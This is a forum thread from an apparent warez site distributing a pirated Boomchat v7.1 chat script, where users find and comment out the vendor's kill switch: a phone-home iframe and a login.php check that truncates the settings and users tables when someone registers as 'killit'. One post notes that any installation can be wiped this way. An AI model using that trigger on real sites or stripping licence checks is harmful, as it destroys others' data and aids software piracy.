[GET] Boomchat v7.1 +Addons+Skins [Updated: December 14, 2015]

***YJobs*** · 12-13-2015, 08:00 AM

Solving the problem can be solved by cleaning the database , it sticks this code

***blackwordwide*** · 12-14-2015, 02:28 PM

anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server

***ozghelp*** · 12-14-2015, 03:31 PM

(12-14-2015 02:28 PM)blackwordwide Wrote: anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server

Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"

***blackwordwide*** · 12-15-2015, 07:22 AM

(12-14-2015 03:31 PM)ozghelp Wrote:
(12-14-2015 02:28 PM)blackwordwide Wrote: anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server

Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"

thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(

***sup3rman*** · (This post was last modified: 12-15-2015 08:51 AM by sup3rman.)

(12-15-2015 07:22 AM)blackwordwide Wrote:
(12-14-2015 03:31 PM)ozghelp Wrote:
(12-14-2015 02:28 PM)blackwordwide Wrote: anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server

Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"

thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(

If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:

Code:

                            //if($username == 'killit'){

                                //$mysqli->query("TRUNCATE TABLE  setting");

                                //$mysqli->query("TRUNCATE TABLE  users");

                            //}

If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.

***benji*** · 12-16-2015, 08:18 AM

great share bud thank's, max reps added

***oliver108*** · 12-16-2015, 10:03 PM

(12-15-2015 08:31 AM)sup3rman Wrote:
(12-15-2015 07:22 AM)blackwordwide Wrote:
(12-14-2015 03:31 PM)ozghelp Wrote:
(12-14-2015 02:28 PM)blackwordwide Wrote: anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server

Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"

thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(

If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:

Code:

//if($username == 'killit'){ //$mysqli->query("TRUNCATE TABLE setting"); //$mysqli->query("TRUNCATE TABLE users"); //}

If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.

I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.

***sup3rman*** · 12-17-2015, 12:02 AM

(12-16-2015 10:03 PM)oliver108 Wrote:
(12-15-2015 08:31 AM)sup3rman Wrote:
(12-15-2015 07:22 AM)blackwordwide Wrote:
(12-14-2015 03:31 PM)ozghelp Wrote:
(12-14-2015 02:28 PM)blackwordwide Wrote: anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server

Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"

thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(

If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:

Code:

//if($username == 'killit'){ //$mysqli->query("TRUNCATE TABLE setting"); //$mysqli->query("TRUNCATE TABLE users"); //}

If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.

I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.

Yes didnt see that one. This backdoors are so irresponsible for a dev, I have googled for some of this script installation and you can wipe the db just registering with "killit" so stupid

***oliver108*** · 12-17-2015, 12:42 AM

(12-17-2015 12:02 AM)sup3rman Wrote:
(12-16-2015 10:03 PM)oliver108 Wrote:
(12-15-2015 08:31 AM)sup3rman Wrote:
(12-15-2015 07:22 AM)blackwordwide Wrote:
(12-14-2015 03:31 PM)ozghelp Wrote:

thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(

If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:

Code:

//if($username == 'killit'){ //$mysqli->query("TRUNCATE TABLE setting"); //$mysqli->query("TRUNCATE TABLE users"); //}

If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.

I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.

Yes didnt see that one. This backdoors are so irresponsible for a dev, I have googled for some of this script installation and you can wipe the db just registering with "killit" so stupid

I looked through the code sequence, but I still don't now 2 things: how the "inventor" knows, who is using his script - probably somewhere is a hidden line what send him the domain adress, i don't now -, and the 2nd, how he rewrite the main room-s data (topic, log, etc.)

***sup3rman*** · 12-17-2015, 02:09 AM

(12-17-2015 12:42 AM)oliver108 Wrote:
(12-17-2015 12:02 AM)sup3rman Wrote:
(12-16-2015 10:03 PM)oliver108 Wrote:
(12-15-2015 08:31 AM)sup3rman Wrote:
(12-15-2015 07:22 AM)blackwordwide Wrote: thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(

If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:

Code:

//if($username == 'killit'){ //$mysqli->query("TRUNCATE TABLE setting"); //$mysqli->query("TRUNCATE TABLE users"); //}

If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.

I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.

Yes didnt see that one. This backdoors are so irresponsible for a dev, I have googled for some of this script installation and you can wipe the db just registering with "killit" so stupid

I looked through the code sequence, but I still don't now 2 things: how the "inventor" knows, who is using his script - probably somewhere is a hidden line what send him the domain adress, i don't now -, and the 2nd, how he rewrite the main room-s data (topic, log, etc.)

I think the homecall is in the iframe in admin_settings.php:

Code:

<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>

I dont remember but in v6.0 there was a comand for chaging the name of the main room, in v7 there is no such comand or I cant find it.